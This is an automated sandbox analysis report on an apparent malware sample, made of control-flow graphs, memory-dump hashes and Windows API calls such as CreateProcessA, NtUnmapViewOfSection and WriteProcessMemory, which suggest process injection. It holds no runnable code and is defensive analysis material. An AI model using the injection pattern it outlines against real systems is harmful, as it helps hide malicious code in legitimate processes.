                                    control_flow_graph 294 58abe44-58acc70 297 58ad136-58ad19c 294->297 298 58acc76-58acc7b 294->298 305 58ad1a3-58ad22b 297->305 298->297 299 58acc81-58acc9e 298->299 299->305 306 58acca4-58acca8 299->306 352 58ad236-58ad2b8 305->352 307 58accaa-58accb4 call 58ac9cc 306->307 308 58accb7-58accbb 306->308 307->308 309 58accca-58accd1 308->309 310 58accbd-58accc7 call 58ac9cc 308->310 315 58acdc9-58acdce 309->315 316 58accd7-58acdae call 58ad939 call 58ac9d8 * 2 309->316 310->309 318 58acdd0-58acdd4 315->318 319 58acdd6-58acddb 315->319 486 58acdb0 call 58adc18 316->486 487 58acdb0 call 58adc07 316->487 318->319 323 58acddd-58acde1 318->323 324 58acded-58ace1d call 58ac9e4 * 3 319->324 327 58ad4c9-58ad542 323->327 328 58acde7-58acdea 323->328 351 58ace23-58ace26 324->351 324->352 344 58ad54b-58ad568 327->344 345 58ad544-58ad54a 327->345 328->324 345->344 351->352 354 58ace2c-58ace2e 351->354 367 58ad2c0-58ad342 352->367 354->352 358 58ace34-58ace69 354->358 355 58acdb6-58acdbd 355->315 359 58acdbf 355->359 366 58ace6f-58ace78 358->366 358->367 359->315 369 58acfdb-58acfdf 366->369 370 58ace7e-58aced8 call 58ac9e4 * 2 call 58ac9f4 * 2 366->370 372 58ad34a-58ad3cc 367->372 369->372 373 58acfe5-58acfe9 369->373 414 58aceea 370->414 415 58aceda-58acee3 370->415 378 58ad3d4-58ad401 372->378 377 58acfef-58acff5 373->377 373->378 382 58acff9-58ad02e 377->382 383 58acff7 377->383 392 58ad408-58ad48a 378->392 387 58ad035-58ad03b 382->387 383->387 387->392 393 58ad041-58ad049 387->393 447 58ad492-58ad4c1 392->447 397 58ad04b-58ad04f 393->397 398 58ad050-58ad052 393->398 397->398 403 58ad0b4-58ad0ba 398->403 404 58ad054-58ad078 398->404 406 58ad0d9-58ad10e 403->406 407 58ad0bc-58ad0d7 403->407 433 58ad07a-58ad07f 404->433 434 58ad081-58ad085 404->434 425 58ad115-58ad121 406->425 407->425 419 58aceee-58acef0 414->419 415->419 422 58acee5-58acee8 415->422 428 58acef2 419->428 429 58acef7-58acefb 419->429 422->419 425->447 448 58ad127-58ad133 425->448 428->429 431 58acf09-58acf0f 429->431 432 58acefd-58acf04 429->432 440 58acf19-58acf1e 431->440 441 58acf11-58acf17 431->441 436 58acfa6-58acfaa 432->436 437 58ad091-58ad0a2 433->437 434->327 443 58ad08b-58ad08e 434->443 445 58acfc9-58acfd5 436->445 446 58acfac-58acfc6 436->446 488 58ad0a4 call 58adeb3 437->488 489 58ad0a4 call 58adec0 437->489 449 58acf24-58acf2a 440->449 441->449 443->437 445->369 445->370 446->445 447->327 455 58acf2c-58acf2e 449->455 456 58acf30-58acf35 449->456 451 58ad0aa-58ad0b2 451->425 460 58acf37-58acf49 455->460 456->460 463 58acf4b-58acf51 460->463 464 58acf53-58acf58 460->464 467 58acf5e-58acf65 463->467 464->467 471 58acf6b 467->471 472 58acf67-58acf69 467->472 475 58acf70-58acf7b 471->475 472->475 476 58acf9f 475->476 477 58acf7d-58acf80 475->477 476->436 477->436 480 58acf82-58acf88 477->480 481 58acf8a-58acf8d 480->481 482 58acf8f-58acf98 480->482 481->476 481->482 482->436 484 58acf9a-58acf9d 482->484 484->436 484->476 486->355 487->355 488->451 489->451
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119848113.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_58a0000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Htq$Htq$Htq$Htq$Htq
                                    • API String ID: 0-1919477
                                    • Opcode ID: 7c20e325172a1ea140e716fb7146860c5c08c83f6bb616bde3e0d612e0ace3af
                                    • Instruction ID: 353091a6042acade9f564948e2f122886272b9d2ef7b54f59ff0b35062766759
                                    • Opcode Fuzzy Hash: 7c20e325172a1ea140e716fb7146860c5c08c83f6bb616bde3e0d612e0ace3af
                                    • Instruction Fuzzy Hash: C2429271E002588FEB54DF68C8547AEBBF2BF88300F14846AD549EB395DB349D85CB91
                                    APIs
                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 05906EBD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: SectionUnmapView
                                    • String ID:
                                    • API String ID: 498011366-0
                                    • Opcode ID: 1e5cfb8fdbe2e0decfed753fe1a7ee6dffef4f759a61cfe7b881c1ebb8bd0986
                                    • Instruction ID: cce0755dbb9a4ad2744d3016730a0d9e3618a4f3d9b88fbd2d77e62925393ea8
                                    • Opcode Fuzzy Hash: 1e5cfb8fdbe2e0decfed753fe1a7ee6dffef4f759a61cfe7b881c1ebb8bd0986
                                    • Instruction Fuzzy Hash: 061116B5D003498FDB20DFA9D5457AFBFF5AF88320F20882AD419A7250CB79A944CB95
                                    APIs
                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 05906EBD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: SectionUnmapView
                                    • String ID:
                                    • API String ID: 498011366-0
                                    • Opcode ID: 401a59ddf27601c324d63a301b1b871311bdf62cd76993b50d16368f5f03e6dc
                                    • Instruction ID: 33516981c5cbe2eae878661061a39085938a7be6f40431f8853f498c35b22355
                                    • Opcode Fuzzy Hash: 401a59ddf27601c324d63a301b1b871311bdf62cd76993b50d16368f5f03e6dc
                                    • Instruction Fuzzy Hash: 441116B1D003498FDB20DFAAD44579FFFF9AB88320F20881AD419A7240CB75A944CBA1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: DispatchMessage
                                    • String ID:
                                    • API String ID: 2061451462-0
                                    • Opcode ID: 6c9debafd96b1f428fe6e59e0cfcf2094da9836b430772506a5db4b36237983c
                                    • Instruction ID: f9c6dbc0b4a62877df596170c21b2cad0f822ef3cc63fca83d000e0c0c81568a
                                    • Opcode Fuzzy Hash: 6c9debafd96b1f428fe6e59e0cfcf2094da9836b430772506a5db4b36237983c
                                    • Instruction Fuzzy Hash: A4F17F34A00209CFDF14DFA9C948BADBBF6FF88314F159959E809AF295DB70A945CB40
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d3de35e6475da70a24927f49ad206b68b8e6b5c2100b6840485d26fe61080ebf
                                    • Instruction ID: 7db1289207d6e77f8295ec0552e75c2ab1ed61a569afb9e2016bfc08bb90d4c9
                                    • Opcode Fuzzy Hash: d3de35e6475da70a24927f49ad206b68b8e6b5c2100b6840485d26fe61080ebf
                                    • Instruction Fuzzy Hash: A7C1C9317007158FEB2ADB79C460BAEB7FAAF89700F108869D146CB6D0DB35E941CB52
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119848113.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_58a0000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 62fd308985eda478be00d2e17b4266b8e0de2a0eba975e62ca37da138a4779c8
                                    • Instruction ID: 5dd854f8f34042fa70cee7b41a1da249aedb400d9b0f72b0b1d420ce1de624e0
                                    • Opcode Fuzzy Hash: 62fd308985eda478be00d2e17b4266b8e0de2a0eba975e62ca37da138a4779c8
                                    • Instruction Fuzzy Hash: 30B15D72A002489FEF15CFA9C884B9DBBB2BF84300F14856AE849EB255EB30DD45CF51
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119848113.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_58a0000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 245552105f21ee8c9d6193f5d2c89b9b67334b9d71b53182cd7db73f32f7e39f
                                    • Instruction ID: 790a4a7497767500500b6755c466ddc41e3d057837799ec39dca05b8559d5d17
                                    • Opcode Fuzzy Hash: 245552105f21ee8c9d6193f5d2c89b9b67334b9d71b53182cd7db73f32f7e39f
                                    • Instruction Fuzzy Hash: D2919235E0031A8FDB05DFA4D89899DBBBAFF89310F158215E815EB2A4DB30AD85CB50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 538 590676f-59067c4 540 59067c6-59067eb 538->540 541 5906828-59068bd 538->541 540->541 543 59068f6-5906916 541->543 544 59068bf-59068c9 541->544 551 5906918-5906922 543->551 552 590694f-590697e 543->552 544->543 545 59068cb-59068cd 544->545 546 59068f0-59068f3 545->546 547 59068cf-59068d9 545->547 546->543 549 59068db 547->549 550 59068dd-59068ec 547->550 549->550 550->550 553 59068ee 550->553 551->552 554 5906924-5906926 551->554 560 5906980-590698a 552->560 561 59069b7-5906a71 CreateProcessA 552->561 553->546 555 5906928-5906932 554->555 556 5906949-590694c 554->556 558 5906934 555->558 559 5906936-5906945 555->559 556->552 558->559 559->559 562 5906947 559->562 560->561 563 590698c-590698e 560->563 572 5906a73-5906a79 561->572 573 5906a7a-5906b00 561->573 562->556 565 5906990-590699a 563->565 566 59069b1-59069b4 563->566 567 590699c 565->567 568 590699e-59069ad 565->568 566->561 567->568 568->568 570 59069af 568->570 570->566 572->573 583 5906b10-5906b14 573->583 584 5906b02-5906b06 573->584 586 5906b24-5906b28 583->586 587 5906b16-5906b1a 583->587 584->583 585 5906b08 584->585 585->583 588 5906b38-5906b3c 586->588 589 5906b2a-5906b2e 586->589 587->586 590 5906b1c 587->590 592 5906b4e-5906b55 588->592 593 5906b3e-5906b44 588->593 589->588 591 5906b30 589->591 590->586 591->588 594 5906b57-5906b66 592->594 595 5906b6c 592->595 593->592 594->595 597 5906b6d 595->597 597->597
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 50e366ccea3fd323bcc6a9eae58e697e875c57eb3f4a7a67364b31563f6738d3
                                    • Instruction ID: 4306f3ca96cf0c77755ed1c2fe63d31e5dd0890b322c781852445e49d4376fd3
                                    • Opcode Fuzzy Hash: 50e366ccea3fd323bcc6a9eae58e697e875c57eb3f4a7a67364b31563f6738d3
                                    • Instruction Fuzzy Hash: 1BB1DF72D002198FDF20CF68C881BADBBF6FF44310F1499A9D809A7280DB7499A5CF91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 598 590681d-59068bd 601 59068f6-5906916 598->601 602 59068bf-59068c9 598->602 609 5906918-5906922 601->609 610 590694f-590697e 601->610 602->601 603 59068cb-59068cd 602->603 604 59068f0-59068f3 603->604 605 59068cf-59068d9 603->605 604->601 607 59068db 605->607 608 59068dd-59068ec 605->608 607->608 608->608 611 59068ee 608->611 609->610 612 5906924-5906926 609->612 618 5906980-590698a 610->618 619 59069b7-5906a71 CreateProcessA 610->619 611->604 613 5906928-5906932 612->613 614 5906949-590694c 612->614 616 5906934 613->616 617 5906936-5906945 613->617 614->610 616->617 617->617 620 5906947 617->620 618->619 621 590698c-590698e 618->621 630 5906a73-5906a79 619->630 631 5906a7a-5906b00 619->631 620->614 623 5906990-590699a 621->623 624 59069b1-59069b4 621->624 625 590699c 623->625 626 590699e-59069ad 623->626 624->619 625->626 626->626 628 59069af 626->628 628->624 630->631 641 5906b10-5906b14 631->641 642 5906b02-5906b06 631->642 644 5906b24-5906b28 641->644 645 5906b16-5906b1a 641->645 642->641 643 5906b08 642->643 643->641 646 5906b38-5906b3c 644->646 647 5906b2a-5906b2e 644->647 645->644 648 5906b1c 645->648 650 5906b4e-5906b55 646->650 651 5906b3e-5906b44 646->651 647->646 649 5906b30 647->649 648->644 649->646 652 5906b57-5906b66 650->652 653 5906b6c 650->653 651->650 652->653 655 5906b6d 653->655 655->655
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05906A5E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 15ee81cd8b491ac7cdef2dbb5c5cfb3a75109af1f262af53b36b32e51f5805c9
                                    • Instruction ID: 83ed3b7d923332da05b88e5a3150b5601497d68a8bddb5ef1c2681781c5e6b9a
                                    • Opcode Fuzzy Hash: 15ee81cd8b491ac7cdef2dbb5c5cfb3a75109af1f262af53b36b32e51f5805c9
                                    • Instruction Fuzzy Hash: 49917D71D0021A9FDF20DF68C841BEDBBF6BF48310F1489A9E819A7280DB749995CF91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 656 5906828-59068bd 658 59068f6-5906916 656->658 659 59068bf-59068c9 656->659 666 5906918-5906922 658->666 667 590694f-590697e 658->667 659->658 660 59068cb-59068cd 659->660 661 59068f0-59068f3 660->661 662 59068cf-59068d9 660->662 661->658 664 59068db 662->664 665 59068dd-59068ec 662->665 664->665 665->665 668 59068ee 665->668 666->667 669 5906924-5906926 666->669 675 5906980-590698a 667->675 676 59069b7-5906a71 CreateProcessA 667->676 668->661 670 5906928-5906932 669->670 671 5906949-590694c 669->671 673 5906934 670->673 674 5906936-5906945 670->674 671->667 673->674 674->674 677 5906947 674->677 675->676 678 590698c-590698e 675->678 687 5906a73-5906a79 676->687 688 5906a7a-5906b00 676->688 677->671 680 5906990-590699a 678->680 681 59069b1-59069b4 678->681 682 590699c 680->682 683 590699e-59069ad 680->683 681->676 682->683 683->683 685 59069af 683->685 685->681 687->688 698 5906b10-5906b14 688->698 699 5906b02-5906b06 688->699 701 5906b24-5906b28 698->701 702 5906b16-5906b1a 698->702 699->698 700 5906b08 699->700 700->698 703 5906b38-5906b3c 701->703 704 5906b2a-5906b2e 701->704 702->701 705 5906b1c 702->705 707 5906b4e-5906b55 703->707 708 5906b3e-5906b44 703->708 704->703 706 5906b30 704->706 705->701 706->703 709 5906b57-5906b66 707->709 710 5906b6c 707->710 708->707 709->710 712 5906b6d 710->712 712->712
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05906A5E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: f155c0fda8f1365b7d0286d5a364d5851f857b8c3d7ca1326c87bd89c0b5fa7b
                                    • Instruction ID: 2c73f73c051d84e8c5fbdcc64c54748605064825ec3a168843851f307d4c2f59
                                    • Opcode Fuzzy Hash: f155c0fda8f1365b7d0286d5a364d5851f857b8c3d7ca1326c87bd89c0b5fa7b
                                    • Instruction Fuzzy Hash: A3916D71D002199FDF20DF68C841BEDBBF6BF48310F148969E819A7280DB749995CF91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 713 182ad68-182ad77 714 182ada3-182ada7 713->714 715 182ad79-182ad86 call 182a0c0 713->715 717 182adbb-182adfc 714->717 718 182ada9-182adb3 714->718 721 182ad88 715->721 722 182ad9c 715->722 724 182ae09-182ae17 717->724 725 182adfe-182ae06 717->725 718->717 768 182ad8e call 182aff0 721->768 769 182ad8e call 182b000 721->769 722->714 726 182ae3b-182ae3d 724->726 727 182ae19-182ae1e 724->727 725->724 729 182ae40-182ae47 726->729 730 182ae20-182ae27 call 182a0cc 727->730 731 182ae29 727->731 728 182ad94-182ad96 728->722 732 182aed8-182af98 728->732 735 182ae54-182ae5b 729->735 736 182ae49-182ae51 729->736 733 182ae2b-182ae39 730->733 731->733 763 182afa0-182afcb GetModuleHandleW 732->763 764 182af9a-182af9d 732->764 733->729 739 182ae68-182ae71 call 182a0dc 735->739 740 182ae5d-182ae65 735->740 736->735 744 182ae73-182ae7b 739->744 745 182ae7e-182ae83 739->745 740->739 744->745 746 182aea1-182aea5 745->746 747 182ae85-182ae8c 745->747 751 182aeab-182aeae 746->751 747->746 749 182ae8e-182ae9e call 182a0ec call 182a0fc 747->749 749->746 754 182aeb0-182aece 751->754 755 182aed1-182aed7 751->755 754->755 765 182afd4-182afe8 763->765 766 182afcd-182afd3 763->766 764->763 766->765 768->728 769->728
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0182AFBE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2118448425.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1820000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 17e6fe04e87640d0ba77405b1e017c2c29147d6255d98a105544cf0c21f1df23
                                    • Instruction ID: 3d76b700d003267edb730a0ac0f2e29d642ca9423d32549faffcf4bed9e93858
                                    • Opcode Fuzzy Hash: 17e6fe04e87640d0ba77405b1e017c2c29147d6255d98a105544cf0c21f1df23
                                    • Instruction Fuzzy Hash: 277147B0A00B158FD729DF29D04475ABBF6FF88304F00892DD58AD7A50D775EA8ACB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 895 5900370-5900388 898 59003b4 895->898 899 590038a-5900398 895->899 900 59003e2 898->900 901 59003b6-59003bf 898->901 903 59003c4-59003c7 899->903 905 590039a-59003b3 899->905 904 59025e8-590265d PeekMessageW 900->904 901->903 903->904 906 5902666-5902687 904->906 907 590265f-5902665 904->907 905->898 907->906
                                    APIs
                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,05902202,00000000,00000000,04294120,032DB5EC), ref: 05902650
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: MessagePeek
                                    • String ID:
                                    • API String ID: 2222842502-0
                                    • Opcode ID: 9ec961034dc0a956eb080c71c59b4c79b984b1bcfd43fcab6d509144cc1ebf47
                                    • Instruction ID: 6be9ef644d41adaae9c0f16f664a231d07f5f73e7542bc256fafab0b77652af8
                                    • Opcode Fuzzy Hash: 9ec961034dc0a956eb080c71c59b4c79b984b1bcfd43fcab6d509144cc1ebf47
                                    • Instruction Fuzzy Hash: B0515AB58043898FDB10CF99D848BDEBFF8EF59310F14845AE958AB291D338A544CBA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 909 58a18e4-58a1956 910 58a1958-58a195e 909->910 911 58a1961-58a1968 909->911 910->911 912 58a196a-58a1970 911->912 913 58a1973-58a1a12 CreateWindowExW 911->913 912->913 915 58a1a1b-58a1a53 913->915 916 58a1a14-58a1a1a 913->916 920 58a1a60 915->920 921 58a1a55-58a1a58 915->921 916->915 922 58a1a61 920->922 921->920 922->922
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 058A1A02
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119848113.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_58a0000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: 4629c40de5ffd47529746d89e836b189ae78a7ac18167bef3f9991d6f0661765
                                    • Instruction ID: d497516030e72be274de9c7e5e939c7eed6eee8c67d41e232dc2a796809394d4
                                    • Opcode Fuzzy Hash: 4629c40de5ffd47529746d89e836b189ae78a7ac18167bef3f9991d6f0661765
                                    • Instruction Fuzzy Hash: 0851DEB5D10309DFDB14CF99C984ADEBBB5BF48310F24862AE819AB250D774A985CF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 923 58a18f0-58a1956 924 58a1958-58a195e 923->924 925 58a1961-58a1968 923->925 924->925 926 58a196a-58a1970 925->926 927 58a1973-58a1a12 CreateWindowExW 925->927 926->927 929 58a1a1b-58a1a53 927->929 930 58a1a14-58a1a1a 927->930 934 58a1a60 929->934 935 58a1a55-58a1a58 929->935 930->929 936 58a1a61 934->936 935->934 936->936
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 058A1A02
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119848113.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_58a0000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: 611707e1ae76a947c1092dd2dd8c7e95cbe783339fb2eee8ac1e71cdb8444109
                                    • Instruction ID: a42d49b88d427f17495e652bdeac434e440e68897f8fa0c3b147ff7b0256e766
                                    • Opcode Fuzzy Hash: 611707e1ae76a947c1092dd2dd8c7e95cbe783339fb2eee8ac1e71cdb8444109
                                    • Instruction Fuzzy Hash: 5941CFB1D10309DFDB14CF99C984ADEBBB5BF48310F24852AE819AB210D774A985CF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1094 1825a6c-1825a77 1096 1825af1-1825b03 1094->1096
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2118448425.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1820000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ac7c71222d10a27c60b7fb2f11303d567cbb3a1737bdb8865b1d9253146c2a39
                                    • Instruction ID: 0f816bd29973b42b3ef9b37a95df096e02aae1c2a6dc24ca6194205e3dfbc5b0
                                    • Opcode Fuzzy Hash: ac7c71222d10a27c60b7fb2f11303d567cbb3a1737bdb8865b1d9253146c2a39
                                    • Instruction Fuzzy Hash: 7741CEB5D44368CFDB12CFA8D8857EDBBB0EF42314F14808AC406AB255C7B56A8ACF51

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1098 18244d4-18259c1 CreateActCtxA 1102 18259c3-18259c9 1098->1102 1103 18259ca-1825a24 1098->1103 1102->1103 1110 1825a33-1825a37 1103->1110 1111 1825a26-1825a29 1103->1111 1112 1825a48 1110->1112 1113 1825a39-1825a45 1110->1113 1111->1110 1115 1825a49 1112->1115 1113->1112 1115->1115
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 018259B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2118448425.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1820000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: e12db166809e576b98e8f7349781acd8c2d92f679d1ed31687ed54eeb49b61a1
                                    • Instruction ID: 2ea023a85efaf0919cf92c4547b71360e8f49d281ab15a73185846503082dc15
                                    • Opcode Fuzzy Hash: e12db166809e576b98e8f7349781acd8c2d92f679d1ed31687ed54eeb49b61a1
                                    • Instruction Fuzzy Hash: 0641CFB0D0071DCADB25CFAAC884BDDBBF5BF49304F20805AD809AB255DB756985CF91
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 018259B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2118448425.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1820000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: 1275e7826651c2ba140bc2e9329d99a1297dd4693eaf95f5249d602231ca5465
                                    • Instruction ID: 9af2d75221f6c2d1b1b562d534219f51c8633ce3e10f7f059e711fc30efb4462
                                    • Opcode Fuzzy Hash: 1275e7826651c2ba140bc2e9329d99a1297dd4693eaf95f5249d602231ca5465
                                    • Instruction Fuzzy Hash: 2A41E2B0D00719CEDB25DFA9C884BCDBBF5BF49304F20805AD809AB255DB756989CF91
                                    APIs
                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 058A4111
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119848113.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_58a0000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: CallProcWindow
                                    • String ID:
                                    • API String ID: 2714655100-0
                                    • Opcode ID: ddf7cc189888a033b5f02ece44f3d7f0fd4b16fdf57ea7b247a0b3808edc00e5
                                    • Instruction ID: ce8180feb74b112e7f4e74c6b4cacac901612fbcce7cd6104761f086ac147f75
                                    • Opcode Fuzzy Hash: ddf7cc189888a033b5f02ece44f3d7f0fd4b16fdf57ea7b247a0b3808edc00e5
                                    • Instruction Fuzzy Hash: 45413AB5900309CFDB14DF99C448AAABBF5FF88314F24C459D919AB321D375A845CFA0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119848113.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_58a0000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: CreateFromIconResource
                                    • String ID:
                                    • API String ID: 3668623891-0
                                    • Opcode ID: b3e08256437e3cab92f65a6d330c9440d3e19bd2191b2e0889b8f5cd7fb05d64
                                    • Instruction ID: ce5e43da7e063beca7c64d00aa72932cc8fa0fda4f1a6032c762d2957c157429
                                    • Opcode Fuzzy Hash: b3e08256437e3cab92f65a6d330c9440d3e19bd2191b2e0889b8f5cd7fb05d64
                                    • Instruction Fuzzy Hash: 7831ABB29053889FDB11CFA9D804AEEBFF4EF09310F14805AE958E7611C3359954DFA1
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05906DF8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: ea55e9c156e2bee602bd115db9c79efbdcf2beee3566b7df02a60af5a236d1c5
                                    • Instruction ID: 72d2332ad6d83f50e9b72824a75e63bfa316fd31706a67d05d856a358914121b
                                    • Opcode Fuzzy Hash: ea55e9c156e2bee602bd115db9c79efbdcf2beee3566b7df02a60af5a236d1c5
                                    • Instruction Fuzzy Hash: 782155B5D003498FDB10CFA9C981BEEBBF5FF48310F10882AE919A7240C7789954DBA1
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05906DF8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: 362c2d41f98ae288511828a50ab5e1c14e5a75c6682a405608548e25caf74ea0
